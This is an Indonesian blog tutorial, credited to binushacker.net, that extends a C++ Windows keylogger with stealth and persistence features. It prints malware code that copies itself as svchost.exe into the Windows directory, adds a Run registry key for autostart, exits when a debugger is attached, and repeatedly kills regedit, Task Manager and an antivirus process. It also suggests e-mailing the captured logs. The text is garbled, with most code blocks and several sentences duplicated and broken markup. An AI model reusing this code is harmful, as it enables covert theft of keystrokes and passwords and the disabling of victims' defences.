Apa itu keylogger? Mungkin dibeberapa artikel disini telah dibahas apa itu keylogger,namun untuk lebih jelasnya,saya coba jelaskan Ke...
Apa itu keylogger?
Mungkin dibeberapa artikel disini telah dibahas apa itu keylogger,namun untuk lebih jelasnya,saya coba jelaskan
Keylogger atau Perekam Ketikan merupakan sebuah perangkat baik itu perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol papan ketik [keyboard]. Sebuah perekam ketikan atau keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol papan ketik tersebut ke dalam sebuah berkas catatan (log file). Beberapa perekam ketikan tertentu bahkan dapat mengirimkan hasil rekamannya ke surel [e-mail] tertentu secara berkala.
Keylogger dapat digunakan untuk kepentingan yang baik atau bahkan bisa digunakan untuk kepentingan yang jahat. Kepentingan yang baik antara lain untuk memantau produktivitas karyawan, untuk penegakan hukum dan pencarian bukti kejahatan. Kepentingan yang buruk antara lain pencurian data dan password. (wikipedia)
Beberapa kelebihan keylogger pada artikel ini?
- Keylogger berbasis API,full written in C++,mudah dikembangkan.
- Size keylogger yang relatif kecil, hanya 20-30 KB tanpa dikompresi.
- Mempunyai fitur self copy,auto startup,memonitoring proses yang aktif dan mengakhiri proses yang dapat membahayakan keylogger
- Tidak mempunyai GUI, sehingga tidak tampak di Tab App pada task manager
- No dependency, tidak usah membawa “beban” seperti keylogger yang dibuat dengan VB classic
Oke, setelah anda download, bisa anda coba atau me-rebuild ulang projek tersebut. Saya asumsikan keylogger sudah berfungsi dan anda memahaminya, LOG file yang dibuat tidak serapih LOG file keylogger master MrHpx, sehingga anda bisa memodifikasi lagi sesuai keinginan anda.
Lanjut ke tahap pembuatan fungsi lainnya untuk membuat keylogger yang lebih powerfull
AutoStartup dan Self Copy
Untuk menambahkan fungsi autostartup,kita menggunakan fungsi sebagai berikut untuk mengakses dan menulis key pada registry:
[crayon lang="c++"]
//registry
char myname[500],tmpdir[500];
HKEY hKey;
DWORD dwFlags;
//========================
extern int __argc;
extern char **__argv;
//registry
char myname[500],tmpdir[500];
HKEY hKey;
DWORD dwFlags;
//========================
extern int __argc;
extern char **__argv;
ATOM MyRegisterClass(HINSTANCE hInstance);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
__declspec(dllexport) LRESULT CALLBACK KeyEvent (int pHookCode, WPARAM pParamW, LPARAM pParamL);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
__declspec(dllexport) LRESULT CALLBACK KeyEvent (int pHookCode, WPARAM pParamW, LPARAM pParamL);
//EP section
//registry function
void RegWriteString(HKEY hKey, LPCTSTR lpSubKey, LPCTSTR lpValueName, LPCTSTR lpData)
{
int ret = 0;
HKEY phkResult = (HKEY)malloc(255);
ret = RegCreateKey(hKey, lpSubKey, &phkResult);
ret = RegSetValueEx(phkResult, lpValueName, 0, REG_SZ, (BYTE*)lpData, strlen(lpData));
RegCloseKey(hKey);
return;
}
//registry function
void RegWriteString(HKEY hKey, LPCTSTR lpSubKey, LPCTSTR lpValueName, LPCTSTR lpData)
{
int ret = 0;
HKEY phkResult = (HKEY)malloc(255);
ret = RegCreateKey(hKey, lpSubKey, &phkResult);
ret = RegSetValueEx(phkResult, lpValueName, 0, REG_SZ, (BYTE*)lpData, strlen(lpData));
RegCloseKey(hKey);
return;
}
[/crayon]
Contoh Penggunaan AutoStartup:
Mendapatkan path asli dari keylogger, kemudian mencopy dirinya sendiri ke direktori windows dengan namasvchost kemudian membuat key untuk auto startup:
Mendapatkan path asli dari keylogger, kemudian mencopy dirinya sendiri ke direktori windows dengan namasvchost kemudian membuat key untuk auto startup:
[crayon lang="c++"]
//create startup and copying files
char szCurrent[MAX_PATH];
char szPath[MAX_PATH];
GetModuleFileName(NULL,szCurrent, MAX_PATH-1);
GetWindowsDirectory(szPath, sizeof(szPath));
strcat(szPath, “\\”);
strcat(szPath,”svchost.exe”);
CopyFile(szCurrent, szPath, true);
RegWriteString(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\Currentversion\\Run”, “svchost system”, szPath);
[/crayon]
//create startup and copying files
char szCurrent[MAX_PATH];
char szPath[MAX_PATH];
GetModuleFileName(NULL,szCurrent, MAX_PATH-1);
GetWindowsDirectory(szPath, sizeof(szPath));
strcat(szPath, “\\”);
strcat(szPath,”svchost.exe”);
CopyFile(szCurrent, szPath, true);
RegWriteString(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\Currentversion\\Run”, “svchost system”, szPath);
[/crayon]
Anti Debug
[crayon lang="c++"]
// Jika didebug, maka akan keluar
if(IsDebuggerPresent() == TRUE)
ExitProcess(0);
[/crayon]
[crayon lang="c++"]
// Jika didebug, maka akan keluar
if(IsDebuggerPresent() == TRUE)
ExitProcess(0);
[/crayon]
Monitoring proses aktif dan melakukan aksi kill proses yang dianggap membahayakan keylogger
Preprocessor
[crayon lang="c++"]#include tlhelp32.h[/crayon]
[crayon lang="c++"]#include tlhelp32.h[/crayon]
Deklarasi Variabel
[crayon lang="c++"]
DWORD WINAPI terminator(LPVOID Param);
DWORD id = 0;
[/crayon]
[crayon lang="c++"]
DWORD WINAPI terminator(LPVOID Param);
DWORD id = 0;
[/crayon]
Fungsi Proses Killer:
[crayon lang="c++"]
//fungsi proses killer
HANDLE hProcessSnap;
HANDLE hProcess;
[crayon lang="c++"]
//fungsi proses killer
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
void KillProc(char * szProcess)
{
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(hProcessSnap, &pe32);
void KillProc(char * szProcess)
{
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(hProcessSnap, &pe32);
//lakukan pengulangan sampai dapat 
while(Process32Next(hProcessSnap, &pe32))
{
if(!strcmp(pe32.szExeFile, szProcess))
{
hProcess = OpenProcess(PROCESS_TERMINATE, 0, pe32.th32ProcessID);
TerminateProcess(hProcess, 0);
}
}
CloseHandle(hProcess);
CloseHandle(hProcessSnap);
}[/crayon]
Penggunaan Killer Proses
while(Process32Next(hProcessSnap, &pe32))
{
if(!strcmp(pe32.szExeFile, szProcess))
{
hProcess = OpenProcess(PROCESS_TERMINATE, 0, pe32.th32ProcessID);
TerminateProcess(hProcess, 0);
}
}
CloseHandle(hProcess);
CloseHandle(hProcessSnap);
}[/crayon]
Penggunaan Killer Proses
[crayon lang="c++"]
//killer proses
DWORD WINAPI terminator(LPVOID Param)
{
while(1)
{
Sleep(1000);
KillProc(“regedit.exe”);
KillProc(“taskman.exe”);
KillProc(“PCMAV.exe”);
}
return EXIT_SUCCESS;
}
[/crayon]
//killer proses
DWORD WINAPI terminator(LPVOID Param)
{
while(1)
{
Sleep(1000);
KillProc(“regedit.exe”);
KillProc(“taskman.exe”);
KillProc(“PCMAV.exe”);
}
return EXIT_SUCCESS;
}
[/crayon]
Membuat thread baru untuk menjalankan fungsi monitoring dan killer proses:
[crayon lang="c++"]
CreateThread(NULL, 0, &terminator, NULL, 0, &id);
[/crayon]
[crayon lang="c++"]
CreateThread(NULL, 0, &terminator, NULL, 0, &id);
[/crayon]
Oia fungsi tersebut, tulis di main.cpp..
Mengapa tidak membuat file .cpp baru dan menulis fungsi di file tsb? Hemmm.. Karena pada DevC++, pewarisan kelas membuat size program anda membengkak 100%. Entah mengapa, tidak seperti visual c++ buatan microsoft yang sudah dibekali optimasi pada kompilernya.
Mengapa tidak membuat file .cpp baru dan menulis fungsi di file tsb? Hemmm.. Karena pada DevC++, pewarisan kelas membuat size program anda membengkak 100%. Entah mengapa, tidak seperti visual c++ buatan microsoft yang sudah dibekali optimasi pada kompilernya.
Mungkin dari anda, ada yang bertanya. Bagaimana dengan fungsi send lognya via e-mail? Owh itu tergantung kreativitas anda. Banyak referensinya.. hehe 
Akhir kata,selamat ber-coding dan berimajinasi =)
Sumber: www.binushacker.net
